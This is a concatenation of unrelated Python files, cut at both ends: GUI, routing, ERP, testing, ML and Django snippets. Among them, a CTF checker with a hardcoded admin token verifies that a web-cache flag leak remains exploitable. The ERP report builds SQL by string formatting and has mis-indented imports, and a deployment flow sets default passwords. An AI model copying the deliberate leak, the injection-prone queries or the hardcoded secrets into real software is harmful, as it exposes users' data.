        """Handle one frame received from the flyer: log text or plot telemetry."""
        (tick, frameDict) = frame.ToFrameDict()
        if frameDict['文本']:
            text = '[%05d]:%s' % (tick, frameDict['文本'])
            # Equivalent to append() but without adding a newline
            self.mConsolePlainTextEdit.moveCursor(QTextCursor.End)
            self.mConsolePlainTextEdit.insertPlainText(text)
            self.mConsolePlainTextEdit.moveCursor(QTextCursor.End)
            # Once the flyer reports init done, start capturing
            text = frameDict['文本']
            if gFlyerInitDoneStr in text:
                # NOTE(review): Capture() requires a downFrameClass argument;
                # this call will raise TypeError — confirm the intended frame
                # class and pass it here.
                self.Capture()
        else:
            print("采样帧数:%d" % self.frame_count)
            self.frame_count += 1
            label_str = '运行:% 6.1fs' % (1.0 * tick / 1000)
            self.mRunTimeLabel.setText(label_str)
            euler = frameDict['欧拉角']
            if euler:
                label_str = '俯仰:%+6.1f' % euler['俯仰角']
                self.mThetaLabel.setText(label_str)
                label_str = '横滚:%+6.1f' % euler['横滚角']
                self.mPhiLabel.setText(label_str)
                label_str = '偏航:%+6.1f' % euler['偏航角']
                self.mPsiLabel.setText(label_str)
            # Feed the frame to the wave widget (it redraws itself)
            self.mWaveWidget.Append(tick, frameDict)
    # --- keyboard interaction ---
    def keyPressEvent(self, keyEvent):
        key = keyEvent.key()
        # throttle up
        if Qt.Key_W == key:
            accelerator = int(self.mAcceleratorSpinBox.text())
            accelerator += gKeyAcceletorPidStep
            self.mAcceleratorSpinBox.setValue(accelerator)
            self.Start()
        # throttle down
        elif Qt.Key_S == key:
            accelerator = int(self.mAcceleratorSpinBox.text())
            accelerator -= gKeyAcceletorPidStep
            self.mAcceleratorSpinBox.setValue(accelerator)
            self.Start()
        # start with the current spinbox value
        elif Qt.Key_Enter == key or Qt.Key_Return == key:
            self.Start()
        # brake (stop)
        elif Qt.Key_Space == key:
            self.Stop()
        # unused keys
        else:
            pass
|
from tabulate import tabulate
class RoutesTable(object):
    """Distance-vector (RIP-style) routing table.

    Each route is a mutable list [target, next_hop, metric]. Routes learned
    from a neighbour are stored with metric+1; metric 16 marks a route as
    unreachable (route poisoning).
    """

    def __init__(self, initRoutes, localHost):
        self.__host = localHost
        self.__table = initRoutes
        # The local host is always reachable with metric 0.
        self.__table.append([localHost, localHost, 0])
        # Hard-coded mock route retained from the original implementation.
        self.__table.append(["192.168.199.101", "192.168.199.134", 2])
        self.__change = False

    def isTableEmpty(self):
        """Return True when no routes are stored."""
        return self.__table == []

    def print(self):
        """Pretty-print the table with tabulate."""
        print("The router({}) routeTable: ".format(self.__host), flush=True)
        if self.isTableEmpty():
            print('No routes', flush=True)
        else:
            print(tabulate(self.__table, headers=['target', 'next hop', 'metric'], tablefmt='orgbl'), end='\n\n', flush=True)

    def updateRoute(self, route, remoteHost):
        """Merge one route advertised by `remoteHost` (Bellman-Ford relaxation).

        Bug fix: the empty-table branch of the original set `self.change`,
        which creates a brand-new attribute instead of updating the private
        `self.__change` flag, so isChangeLastest() never reported the change.
        """
        if self.isTableEmpty():
            route[1] = remoteHost
            self.__table.append(route)
            self.__change = True
        else:
            change = False
            isFound = False
            for localRouteItem in self.__table:
                # Avoid routing loops: ignore advertisements about ourselves.
                if route[0] == self.__host:
                    print("[updateRouteFunc]same host: ", route[0], flush=True)
                    return
                elif localRouteItem[0] == route[0]:
                    isFound = True
                    # Relax: adopt the advertised path if it is shorter.
                    if localRouteItem[2] > route[2] + 1:
                        localRouteItem[2] = route[2] + 1
                        localRouteItem[1] = remoteHost
                        change = True
                        print("[updateRouteFunc]found condition: ", localRouteItem, flush=True)
                    break
            if not isFound:
                # Unknown target: add it via the advertising neighbour.
                self.__table.append([route[0], remoteHost, route[2] + 1])
                print('[updateRouteFunc]not found condition: ', self.__table[-1], flush=True)
                change = True
            self.__change = change
        print("[updateRouteFunc] finish", flush=True)

    def updateRouteTable(self, routesTable, remoteHost):
        """Merge a whole table advertised by `remoteHost`, then print the result."""
        for route in routesTable:
            self.updateRoute(route, remoteHost)
        print("updateRouteTable", flush=True)
        self.print()

    def poisonRoute(self, remoteHost):
        """Mark every route through `remoteHost` as unreachable (metric 16)."""
        for route in self.__table:
            if route[1] == remoteHost:
                # As rip protocol show , it means that it is unreachable when a remotehost metric is set to 16
                route[2] = 16

    def getTable(self):
        """Return a shallow copy of the routes list."""
        return self.__table[:]

    def getHost(self):
        return self.__host

    def setHost(self, host):
        self.__host = host

    def isChangeLastest(self):
        """Return True when the most recent update changed the table."""
        return self.__change
def formatRouteTables(routesTable):
    """Pretty-print a list of [target, next hop, metric] rows."""
    print(tabulate(routesTable, headers=['target', 'next hop', 'metric'], tablefmt='orgbl'), end='\n\n', flush=True)
# a = routeTable("127.0.0.1")
# b = routeTable("127.0.0.2")
# a.updateRoute(["127.0.0.3", "127.0.0.2", 2])
# a.print()
# b.updateRoute(["127.0.0.3","127.0.0.3",1])
# b.updateRouteTable(a.getTable())
# b.print()
# def RIPadvertise(ip):
|
import random
from requests import *
ADMIN_TOKEN = "CroRQgDwMmJdybKa"
def check(host):
    """Probe the challenge service at `host`; return (status, reason).

    status 1 means healthy; status 0 comes with a short failure reason.
    Fixes: the original created an unused `session()` object and never
    used it (every request went through the module-level get()).
    """
    # index page must advertise /flag
    result = get(f"http://{host}/index")
    if b"/flag" not in result.content:
        return 0, "Dead"
    # a random css name must not leak the flag without the admin token
    result = get(f"http://{host}/flag@3gh3ugh4m.css")
    if b"we{" in result.content:
        return 0, "Flag Leak 1 "
    # the bare /flag route must not leak either
    result = get(f"http://{host}/flag")
    if b"we{" in result.content:
        return 0, "Flag Leak 2"
    # with the admin token the flag must be served
    result = get(f"http://{host}/flag@ufh48fk32.css", cookies={
        "token": ADMIN_TOKEN
    })
    if b"we{" not in result.content:
        return 0, "No Flag"
    # once served, the cached path must be exploitable without the token
    result = get(f"http://{host}/flag@ufh48fk32.css")
    if b"we{" not in result.content:
        return 0, "Cant pwn"
    return 1, ""
# Checker registry consumed by the scoring harness.
FUNCTIONS = [check]
if __name__ == "__main__":
    # Manual smoke test against a local container.
    print(check("172.17.0.2:1006"))
|
# !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = 'CVtek dev'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "CVTek dev"
__status__ = "Development"
__model_name__ = 'resumo_iva.ResumoIva'
import auth, base_models
from orm import *
from form import *
'''
try:
from my_plano_contas import PlanoContas
except:
from plano_contas import PlanoContas
'''
try:
from my_factura_cli import FacturaCliente
except:
from factura_cli import FacturaCliente
try:
from my_factura_forn import FacturaFornecedor
except:
from factura_forn import FacturaFornecedor
class ResumoIva(Model, View):
    """VAT summary report: totals VAT payable (customer invoices) and
    receivable (supplier invoices) between two dates."""
    def __init__(self, **kargs):
        # TODO: later also filter by a single journal or period, etc.
        Model.__init__(self, **kargs)
        self.__name__ = 'resumo_iva'
        self.__title__ = 'Resumo do IVA'
        self.__model_name__ = __model_name__
        self.__list_edit_mode__ = 'edit'
        #self.__db_mode__ = 'None'
        # State machine: Draft -> (Gerar) -> Generated -> print/export
        self.__workflow__ = (
            'estado', {'Rascunho':['Gerar'],'Gerado':['Imprimir', 'Exportar']}
        )
        self.__workflow_auth__ = {
            'Gerar':['All'],
            'Imprimir':['All'],
            'Exportar':['All'],
            'full_access':['Gestor']
        }
        self.__auth__ = {
            'read':['All'],
            'write':['All'],
            'create':['All'],
            'delete':['Gestor'],
            'full_access':['Gestor']
        }
        # Defaults: first day of the current month .. today
        self.data_inicial = date_field(view_order=1, name='Data Inicial', default=datetime.date(datetime.date.today().year,datetime.date.today().month,int(1)))
        self.data_final = date_field(view_order=2, name='Data Final', default=datetime.date.today())
        self.iva_pagar = string_field(view_order=3, name='IVA a Pagar')
        self.iva_receber = string_field(view_order=4, name='IVA a Receber')
        self.estado = info_field(view_order=5, name='Estado', hidden=True, default='Rascunho')
    def get_total_a_pagar(self, data_inicial, data_final):
        """Sum total_iva over confirmed customer invoices in the date range."""
        total_iva=0
        facturas = FacturaCliente(where="data>='{inicio}' AND data <='{fim}' AND estado ='Confirmado'".format(inicio=data_inicial,fim=data_final)).get()
        if len(facturas)!= 0:
            for line in facturas:
                total_iva+=int(line['total_iva'])
        return total_iva
    def get_total_a_receber(self, data_inicial, data_final):
        """Sum VAT over confirmed supplier invoices in the date range."""
        total_iva=0
        facturas = FacturaFornecedor(where="data>='{inicio}' AND data <='{fim}' AND estado ='Confirmado'".format(inicio=data_inicial,fim=data_final)).get()
        if len(facturas)!= 0:
            for line in facturas:
                total_iva += int(FacturaFornecedor().get_total_iva(key=line['id']))
        return total_iva
    def Gerar(self, key, window_id):
        """Workflow action: compute both totals and move to 'Gerado'."""
        self.kargs = get_model_record(model=self, key=key)
        self.kargs['iva_pagar']=str(self.get_total_a_pagar(data_inicial=self.kargs['data_inicial'], data_final=self.kargs['data_final']))
        self.kargs['iva_receber']=str(self.get_total_a_receber(data_inicial=self.kargs['data_inicial'], data_final=self.kargs['data_final']))
        self.kargs['estado']='Gerado'
        self.put()
        return form_edit(window_id = window_id).show()
    def Imprimir(self, key, window_id):
        """Workflow action: render the printable report."""
        print('estou no imprimir do resumo iva')
        template = 'resumo_iva'
        #record = self.prepare_data()
        # NOTE(review): `record` is undefined because the line above is
        # commented out — this method will raise NameError; confirm the
        # prepare_data() wiring before enabling this action.
        return Report(record=record, report_template=template).show()
    def Exportar(self, key, window_id):
        """Workflow action: export report lines as CSV."""
        print('estou na função de Exportar no balancete')
        # NOTE(review): prepare_data() is not defined in this class as shown
        # here — presumably inherited or defined elsewhere; verify.
        result = self.prepare_data()['lines']
        #print('result: ', result)
        return data_to_csv(data=result, model=self, text='Gravar', cols=['codigo', 'conta', 'debito', 'credito', 'saldo'])
|
import unittest
from mbi.factor import Factor
from mbi.domain import Domain
import numpy as np
class TestFactor(unittest.TestCase):
    """Unit tests for mbi.Factor: expansion, transposition, projection,
    aggregation (sum / logsumexp) and arithmetic operators."""

    def setUp(self):
        # A 2x3x4 factor over attributes a, b, c with random values.
        attrs = ['a','b','c']
        shape = [2,3,4]
        domain = Domain(attrs, shape)
        values = np.random.rand(*shape)
        self.factor = Factor(domain, values)

    def test_expand(self):
        domain = Domain(['a','b','c','d'], [2,3,4,5])
        res = self.factor.expand(domain)
        self.assertEqual(res.domain, domain)
        self.assertEqual(res.values.shape, domain.shape)
        # Summing out the broadcast 'd' axis (size 5) scales every entry
        # by 5; multiplying by 0.2 undoes that, recovering the original.
        res = res.sum(['d']) * 0.2
        self.assertTrue(np.allclose(res.values, self.factor.values))

    def test_transpose(self):
        # Transposing reorders the domain (and the value axes) accordingly.
        attrs = ['b','c','a']
        tr = self.factor.transpose(attrs)
        ans = Domain(attrs, [3,4,2])
        self.assertEqual(tr.domain, ans)

    def test_project(self):
        # Projection marginalizes out 'b' and reorders to (c, a).
        res = self.factor.project(['c','a'], agg='sum')
        ans = Domain(['c','a'], [4,2])
        self.assertEqual(res.domain, ans)
        self.assertEqual(res.values.shape, (4,2))
        # Same shape contract for the log-space aggregator.
        res = self.factor.project(['c','a'], agg='logsumexp')
        self.assertEqual(res.domain, ans)
        self.assertEqual(res.values.shape, (4,2))

    def test_sum(self):
        res = self.factor.sum(['a','b'])
        self.assertEqual(res.domain, Domain(['c'],[4]))
        self.assertTrue(np.allclose(res.values, self.factor.values.sum(axis=(0,1))))

    def test_logsumexp(self):
        # logsumexp over axes a (0) and c (2) must match the numpy reference.
        res = self.factor.logsumexp(['a','c'])
        values = self.factor.values
        ans = np.log(np.sum(np.exp(values), axis=(0,2)))
        self.assertEqual(res.domain, Domain(['b'],[3]))
        self.assertTrue(np.allclose(res.values, ans))

    def test_binary(self):
        # Binary ops broadcast over the union of the two domains.
        dom = Domain(['b','d','e'], [3,5,6])
        vals = np.random.rand(3,5,6)
        factor = Factor(dom, vals)
        res = self.factor * factor
        ans = Domain(['a','b','c','d','e'], [2,3,4,5,6])
        self.assertEqual(res.domain, ans)
        res = self.factor + factor
        self.assertEqual(res.domain, ans)
        # Scalar operands keep the domain unchanged.
        res = self.factor * 2.0
        self.assertEqual(res.domain, self.factor.domain)
        res = self.factor + 2.0
        self.assertEqual(res.domain, self.factor.domain)
        res = self.factor - 2.0
        self.assertEqual(res.domain, self.factor.domain)
        # exp then log round-trips the values.
        res = self.factor.exp().log()
        self.assertEqual(res.domain, self.factor.domain)
        self.assertTrue(np.allclose(res.values, self.factor.values))

if __name__ == '__main__':
    unittest.main()
|
import logging
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class ExistRecordCheckOperator(BaseOperator):
    """Airflow data-quality operator.

    Runs ``SELECT COUNT(*)`` against each table on the given Redshift
    connection and raises ``ValueError`` if a table returns no result row
    or contains zero records.
    """

    @apply_defaults
    def __init__(self, redshift_conn_id="", tables=None, *args, **kwargs):
        super(ExistRecordCheckOperator, self).__init__(*args, **kwargs)
        # Bug fix: 'tables=[]' was a mutable default argument shared across
        # all instances; use None as the sentinel instead.
        self.tables = tables if tables is not None else []
        self.redshift_conn_id = redshift_conn_id

    def execute(self, context):
        """Check every configured table; raise on the first empty one."""
        redshift_hook = PostgresHook(self.redshift_conn_id)
        for table in self.tables:
            records = redshift_hook.get_records(f"SELECT COUNT(*) FROM {table}")
            if len(records) < 1 or len(records[0]) < 1:
                raise ValueError(f"{table}: Data quality check failed. Returned no records")
            num_records = records[0][0]
            if num_records < 1:
                raise ValueError(f"{table}: Data quality check failed. Contained 0 rows")
            logging.info(f"{table}: Data quality check passed with {records[0][0]} records")
|
import pytest
from pygears.typing import Queue, TemplateArgumentsError, Uint
def test_inheritance():
    """Queue[...] specializations keep Queue as their base type."""
    assert Queue[1].base is Queue

def test_default():
    """The second template argument (queue level) defaults to 1."""
    a = Queue[2]
    assert a.args[1] == 1
    b = Queue[2, 6]
    assert b.args[1] == 6

def test_equality():
    """Equality compares both arguments, with the default level applied."""
    assert Queue[1] == Queue[1]
    assert Queue[1] == Queue[1, 1]
    assert Queue[1, 2] != Queue[1, 3]
    assert Queue[1, 2] == Queue[1, 2]

def test_repr():
    """repr() reproduces the template-argument spelling."""
    a = Queue['T1', 3]
    assert repr(a) == "Queue['T1', 3]"

def test_str():
    """str() uses the compact [data]^level notation."""
    a = Queue['T1', 3]
    assert str(a) == "[T1]^3"

def test_is_specified():
    """A Queue is fully specified only when no template parameter remains,
    including parameters nested inside the data type."""
    assert Queue[1].specified is True
    assert Queue['T1'].specified is False
    assert Queue[Uint['T2']].specified is False
    assert Queue[Uint[1]].specified is True
def test_subs():
    """Substituting the remaining template parameter specializes the type."""
    a = Queue['T1']
    b = a[1]
    assert b == Queue[1]

def test_multilevel_subs():
    """Substitution reaches template parameters nested in the data type."""
    a = Queue[Uint['T1']]
    b = a[1]
    assert b == Queue[Uint[1]]

@pytest.mark.xfail(raises=TemplateArgumentsError)
def test_excessive_subs():
    """Supplying more values than free template parameters must raise."""
    a = Queue[Uint['T1']]
    a[1, 2]

def test_indexing():
    """Index 0 is the data type, index 1 the 1-bit eot field; the type also
    unpacks into that pair."""
    a = Queue[Uint[10]]
    assert a[0] == Uint[10]
    assert a[1] == Uint[1]
    data, eot = a
    assert data == a[0]
    assert eot == a[1]

def test_queue_of_queues():
    """Nesting queues adds their levels together (2 + 3 == 5)."""
    assert Queue[Queue[Uint[2], 2], 3] == Queue[Uint[2], 5]
|
from Crypto.PublicKey import RSA

# Generate a fresh 2048-bit RSA key pair and write both halves as PEM files.
# Bug fix: the original opened both files without ever closing them (and
# rebound 'file_out' while the first handle was still open); context
# managers guarantee the data is flushed to disk.
key = RSA.generate(2048)
with open("pass_private.pem", "wb") as file_out:
    file_out.write(key.export_key())
with open("pass_public.pem", "wb") as file_out:
    file_out.write(key.publickey().export_key())
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
## Created by: Albert Berenguel
## Computer Vision Center (CVC). Universitat Autonoma de Barcelona
## Email: aberenguel@cvc.uab.es
## Copyright (c) 2017
##
## This source code is licensed under the MIT-style license found in the
## LICENSE file in the root directory of this source tree
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import torch
import torch.nn as nn
import importlib
import pickle
class SimpleEmbedding():
    """Wrapper around a pair of embedding networks F and G.

    Both networks are built from the learner module named in
    ``opt['learner']``; the wrapper handles optimizer parameter collection,
    train/eval mode switching, (de)serialization and CPU/CUDA placement.
    """

    def __init__(self, opt):
        self.opt = opt  # Store the parameters
        self.buildModels(self.opt)
        self.setCuda()

    def buildModels(self, opt):
        """Instantiate the F and G embedding networks from opt['learner']."""
        modelF = importlib.import_module(opt['learner']).build(opt)
        self.embedNetF = modelF.net  # F function
        modelG = importlib.import_module(opt['learner']).build(opt)
        self.embedNetG = modelG.net  # G function

    def parameters(self):
        """Return the parameters of BOTH networks for the optimizer.

        Bug fix: the original concatenated embedNetG's parameters twice,
        so embedNetF was never trained.
        """
        return list(self.embedNetF.parameters()) + list(self.embedNetG.parameters())

    def set(self, mode):
        """Switch both networks to 'training' or 'evaluate' mode."""
        if mode == 'training':
            self.embedNetF.train()
            self.embedNetG.train()
        elif mode == 'evaluate':
            self.embedNetF.eval()
            self.embedNetG.eval()
        else:
            print('model.set: undefined mode - %s' % (mode))

    def isTraining(self):
        """True while the networks are in training mode (F is authoritative)."""
        return self.embedNetF.training

    def default(self, dfDefault):
        # Remember a default value carrier (semantics defined by callers).
        self.df = dfDefault

    def embedF(self, input, g=None, K=None):
        """Embed *input* with F. 'g'/'K' are accepted for interface
        compatibility but unused (fixed: former mutable [] defaults)."""
        return self.embedNetF(input)

    def embedG(self, input):
        """Embed *input* with G."""
        return self.embedNetG(input)

    def save(self, path='./data'):
        """Persist opt (pickle) and both networks' state dicts under *path*."""
        # Bug fix: pickle file is now closed via a context manager.
        with open(os.path.join(path, 'SimpleEmbedding_opt.pkl'), 'wb') as optParametersFile:
            pickle.dump(self.opt, optParametersFile)
        # Clean not needed data of the models
        self.embedNetF.clearState()
        self.embedNetG.clearState()
        torch.save(self.embedNetF.state_dict(), os.path.join(path, 'embedNetF.pth.tar'))
        torch.save(self.embedNetG.state_dict(), os.path.join(path, 'embedNetG.pth.tar'))

    def load(self, pathParams, pathModelF, pathModelG):
        """Rebuild the networks from a saved opt pickle and two checkpoints."""
        with open(pathParams, 'rb') as optParametersFile:
            self.opt = pickle.load(optParametersFile)
        # build the models
        self.buildModels(self.opt)
        # Load the weights and biases of F and G
        checkpoint = torch.load(pathModelF)
        self.embedNetF.load_state_dict(checkpoint['state_dict'])
        checkpoint = torch.load(pathModelG)
        self.embedNetG.load_state_dict(checkpoint['state_dict'])
        # Set cuda
        self.setCuda()

    def setCuda(self, value='default'):
        """Move both networks to GPU or CPU.

        With the default string sentinel the decision comes from
        opt['useCUDA']; otherwise *value* must be a bool.
        """
        if type(value) == str:
            value = self.opt['useCUDA']
        else:
            assert (type(value) == bool)
        if value:
            print('Check CUDA')
            self.embedNetF.cuda()
            self.embedNetG.cuda()
        else:
            self.embedNetF.cpu()
            self.embedNetG.cpu()
def build(opt):
    """Factory entry point used by the training framework."""
    return SimpleEmbedding(opt)
|
from jumpscale.sals.chatflows.chatflows import chatflow_step
from jumpscale.packages.vdc_dashboard.sals.solutions_chatflow import SolutionsChatflowDeploy
class MattermostDeploy(SolutionsChatflowDeploy):
    """Chatflow that deploys a Mattermost instance from the marketplace
    Helm repo, collecting MySQL credentials from the user along the way."""

    SOLUTION_TYPE = "mattermost"
    title = "Mattermost"
    HELM_REPO_NAME = "marketplace"

    # Ordered wizard steps; most are inherited from SolutionsChatflowDeploy,
    # only set_config is defined here.
    steps = [
        "init_chatflow",
        "get_release_name",
        "choose_flavor",
        "set_config",
        "create_subdomain",
        "install_chart",
        "initializing",
        "success",
    ]

    # Extra resource reservations on top of the chosen flavor.
    ADDITIONAL_QUERIES = [
        {"cpu": 100, "memory": 256},  # mysql
        {"cpu": 10, "memory": 10},  # initContainer.remove-lost-found
    ]

    def get_config(self):
        """Return the Helm values derived from the collected chart config."""
        return {
            "ingress.host": self.config.chart_config.domain,
            "mysql.mysqlUser": self.config.chart_config.mysql_user,
            "mysql.mysqlPassword": self.config.chart_config.mysql_password,
            "mysql.mysqlRootPassword": self.config.chart_config.mysql_root_password,
        }

    @chatflow_step(title="Configurations")
    def set_config(self):
        """Prompt for the MySQL user name and the two passwords, then store
        them on the chart config."""
        form = self.new_form()
        mysql_user = form.string_ask("Enter mysql user name", default="mysql", min_length=3, required=True,)
        mysql_password = form.secret_ask(
            "Enter mysql password", default="mySqlPassword", min_length=8, required=True,
        )  # TODO: need to check a valid password
        mysql_root_password = form.secret_ask(
            "Enter mysql password for root user", default="mySqlRootPassword", min_length=8, required=True,
        )  # TODO: need to check a valid password
        form.ask()
        self.config.chart_config.mysql_user = mysql_user.value
        self.config.chart_config.mysql_password = mysql_password.value
        self.config.chart_config.mysql_root_password = mysql_root_password.value

# Module-level alias the chatflow loader looks for.
chat = MattermostDeploy
|
import numpy as np
from elephant.spike_train_generation import homogeneous_poisson_process
from quantities import Hz, s, ms
def square(xs):
    """Return the elementwise square of *xs*."""
    return xs * xs

def function_task(f=square, min=-10, max=10, step=0.5):
    """Sample *f* over the half-open interval [min, max) at the given step.

    Returns the pair (sample points, f(sample points)) as numpy arrays.
    (Parameter names kept for caller compatibility even though they shadow
    the builtins.)
    """
    sample_points = np.arange(start=min, stop=max, step=step)
    return sample_points, f(sample_points)
def transform_to_log_domain_and_shift(ys):
    """Transform a data series into the log domain by shifting it up by its
    minimum value and taking the log.

    The result is log(1 + ys - min(ys)), which is always defined and
    non-negative.

    Bug fix: the original computed log(1 + ys + min(ys)); for series with
    negative values that takes the log of non-positive numbers (NaN/-inf)
    instead of shifting the series up as documented.
    """
    min_y = np.min(ys)
    return np.log(1 + ys - min_y)
def network_input(ys, i, j):
    """Return the window ys[i:j] of the series to feed to the network."""
    return ys[i:j]
def generate_spiketrain_list(ys):
    """One 100 s Poisson spike train per value in *ys*, with firing rate
    10*y Hz (so the series values modulate the rates)."""
    return [
        homogeneous_poisson_process(rate=10.0*y*Hz, t_start=0.0*s, t_stop=100.0*s)
        for y in ys]
def debug_spike_train(spiketrain_list, i, j):
    """Raster-plot the spike trains, shading the band of train indices
    between *i* and *j* (matplotlib window, blocking)."""
    import matplotlib.pyplot as plt
    # plot horizontal bars and shade region between
    # x_low and x_high
    t = spiketrain_list[0].rescale(ms)
    y_low = i * np.ones_like(t)
    y_high = j * np.ones_like(t)
    plt.fill_between(t, y_low, y_high)
    # NOTE(review): this loop variable shadows the parameter 'i'; harmless
    # here because the parameter is no longer read, but worth renaming.
    for i, spiketrain in enumerate(spiketrain_list):
        t = spiketrain.rescale(ms)
        plt.plot(t, i * np.ones_like(t), 'k.', markersize=2)
    plt.axis('tight')
    plt.xlim(0, 1000)  # show only the first second
    plt.xlabel('Time (ms)', fontsize=16)
    plt.ylabel('Spike Train Index', fontsize=16)
    plt.gca().tick_params(axis='both', which='major', labelsize=14)
    plt.show()
# http://elephant.readthedocs.io/en/latest/tutorial.html
# use to generate input
# and then use in spike_source_array
#debug_spike_train(spiketrain_list = generate_spiketrain_list(function_task()[1]), i=1, j=3) |
import exifread
from PIL import Image
def pil_verify(ifile):
    """Return True when PIL can open *ifile* and verify() accepts it.

    Verification failures and unidentifiable/unreadable files yield False;
    any other error raised while opening propagates to the caller.
    """
    try:
        with Image.open(ifile) as image:
            try:
                image.verify()
            except Exception:
                # Corrupt image data.
                return False
            return True
    except IOError:
        # PIL cannot identify/read the file at all.
        return False
def exif_test(ifile):
    """Extract EXIF tags from *ifile*.

    Returns (ok, tags, anydate): ok is False (with None, None) when the
    file cannot be read/parsed; anydate reports whether any tag name
    contains 'Date' (None if that scan itself fails).
    """
    try:
        with open(ifile, 'rb') as im:
            tags = exifread.process_file(im, strict=True)
            try:
                # Idiom fix: generator instead of building a throwaway list.
                anydate = any('Date' in tag for tag in tags)
            except Exception:
                # Narrowed from a bare 'except:'.
                anydate = None
            return True, tags, anydate
    except Exception:
        return False, None, None
|
# -*- coding: utf-8 -*-
"""
/dms/elixier/views_show.py
.. zeigt Inhalte der Elixier-Datenbank
Django content Management System
Hans Rauch
hans.rauch@gmx.net
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.01 18.07.2007 Beginn der Arbeit
0.02 19.07.2007 Dispatcher
"""
from django.shortcuts import render_to_response
from django import newforms as forms
from django.utils.translation import ugettext as _
from dms.utils_form import get_item_vars_show
from dms.roles import require_permission
from dms.utils import show_link
from dms.views_error import show_error
from dms.elixier.views_statistik import views_statistik
from dms.elixier.views_beitraege import views_beitraege
from dms.elixier.views_beitraege import views_select_dest
# -----------------------------------------------------
@require_permission('perm_add')
def elixier_show(request, item_container):
    """Show contents of the Elixier database.

    Dispatches on the 'elixier_op' GET parameter to the statistics or
    article views; without it, renders a section overview of the
    available Elixier operations.
    """
    def get_section_view():
        """Build the section view of the operations available in this folder."""
        from django.template.loader import get_template
        from django.template import Context
        tSection = get_template('app/folder/section.html')
        content = ''
        # --- Daten (article sifting links)
        links = []
        links.append(show_link(item_container.get_absolute_url() + '?elixier_op=fach_beitraege',
                     _(u'Fachbeiträge sichten')))
        cSection = Context ( { 'section': _(u'Elixier-Daten'), 'links': links } )
        content += tSection.render ( cSection)
        # --- Statistik (overall and per-subject statistics links)
        links = []
        links.append(show_link(item_container.get_absolute_url() + \
                     '?elixier_op=gesamt_statistik',
                     _(u'Elixier-Gesamtstatistik')))
        links.append(show_link(item_container.get_absolute_url() + '?elixier_op=fach_statistik',
                     _(u'Elixier-Fachstatistik')))
        cSection = Context ( { 'section': _(u'Elixier-Statistik'), 'links': links } )
        content += tSection.render ( cSection)
        return content

    get = request.GET.copy()
    # NOTE(review): has_key() is Python-2-era Django; 'in' would be the
    # modern spelling.
    if get.has_key('elixier_op'):
        if get['elixier_op'] in ['gesamt_statistik', 'fach_statistik']:
            return views_statistik(request, item_container, get['elixier_op'])
        elif get['elixier_op'] == 'fach_beitraege':
            return views_beitraege(request, item_container, get['elixier_op'])
        elif get['elixier_op'] == 'select_dest':
            return views_select_dest(request, item_container, get['elixier_op'])
        else:
            # Unknown operation: render an error page.
            return show_error(request, item_container, _(u'Fehlende Elixier-Funktion'),
                   '<p>%s: "%s"</p>' % (_(u'Die folgende Elixier-Funktion existiert nicht'),
                   get['elixier_op']) )
    app_name = 'elixier'
    vars = get_item_vars_show(request, item_container, app_name)
    vars['content'] = get_section_view()
    return render_to_response ( 'app/base_folderish.html', vars )
|
'''
You all have used the random library of python. You have seen in the screen-cast of how powerful it is.
In this assignment, you will sort a list let's say list_1 of numbers in increasing order using the random library.
Following are the steps to sort the numbers using the random library.
Step 1: Import the randint definition of the random library of python. Check this page if you want some help.
Step 2: Take the elements of the list_1 as input.
Step 3: randomly choose two indexes i and j within the range of the size of list_1.
Step 4: Swap the elements present at the indexes i and j. After doing this, check whether the list_1 is sorted or not.
Step 5: Repeat steps 3 and 4 until the list is sorted.
>>Input Format:
The first line contains a single number n which signifies the number of elements in the list_1.
From the second line, the elements of the list_1 are given with each number in a new line.
>>Output Format:
Print the elements of the list_1 in a single line with each element separated by a space.
NOTE 1: There should not be any space after the last element.
>>Example:
Input:
4
3
1
2
5
Output:
1 2 3 5
>>Explanation:
The first line of the input is 4. Which means that n is 4, or the number of elements in list_1 is 4. The elements of list_1 are 3, 1, 2, 5 in this order.
The sorted version of this list is 1 2 3 5, which is the output.
NOTE 2: There are many ways to sort the elements of a list. The purpose of this assignment is to show the power of randomness, and obviously it's fun.
'''
from random import randint

# Read n, then n integers (one per line).
n = int(input())
x = [int(input()) for _ in range(n)]

# Randomly swap two positions until the list happens to be sorted
# (the assignment's deliberately silly randomness-powered sort).
while True:
    i, j = randint(0, n - 1), randint(0, n - 1)
    x[i], x[j] = x[j], x[i]
    if all(x[k] <= x[k + 1] for k in range(n - 1)):
        break

# Space-separated output with no trailing space or newline, per the spec.
# Fix: the original abused a list comprehension for its print side effects.
print(" ".join(map(str, x)), end="")
|
import json
from api import login
from api import (get_orgs, get_facultys, get_groups,
get_schedule, get_exams)
from menu_helpers import input_org_info
def create_org_structure(ip, port, username, password):
    """Log in to the API and return the nested mapping
    {org: {faculty: [groups]}} describing the whole server."""
    access_token, refresh_token = login(ip, port, username, password)
    org_struct = {}
    o_res = get_orgs(ip, port, access_token)
    for org in o_res:
        org_struct[org] = {}
        f_res = get_facultys(ip, port, access_token, org)
        for faculty in f_res:
            org_struct[org][faculty] = get_groups(ip, port, access_token, org, faculty)
    return org_struct
def menu_get_org_structure(ip, port, username, password):
    """Fetch the org/faculty/group structure, print it and save it to
    org_structure.json."""
    org_structure = create_org_structure(
        ip,
        port,
        username,
        password)
    print('Структура групп в БД:')
    print(json.dumps(org_structure, indent=4, sort_keys=True, ensure_ascii=False))
    with open('org_structure.json', 'w') as outfile:
        json.dump(org_structure, outfile, indent=4, sort_keys=True)
    print('Структура групп сохранена в org_structure.json')
def menu_get_schedule(ip, port, username, password):
    """Ask the user for org/faculty/group, fetch the class schedule,
    print it and save it to schedule.json."""
    org, faculty, group = input_org_info()
    access_token, refresh_token = login(ip, port, username, password)
    schedule = get_schedule(ip, port, access_token, org, faculty, group)
    # Wrap the schedule in the same nested layout as the org structure.
    data = {
        org:{
            faculty:{
                group: schedule
            }
        }
    }
    print('Расписание занятий:')
    print(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))
    with open('schedule.json', 'w') as outfile:
        json.dump(data, outfile, indent=4, sort_keys=True)
    print('Расписание занятий группы сохранено в schedule.json')
def menu_get_exams(ip, port, username, password):
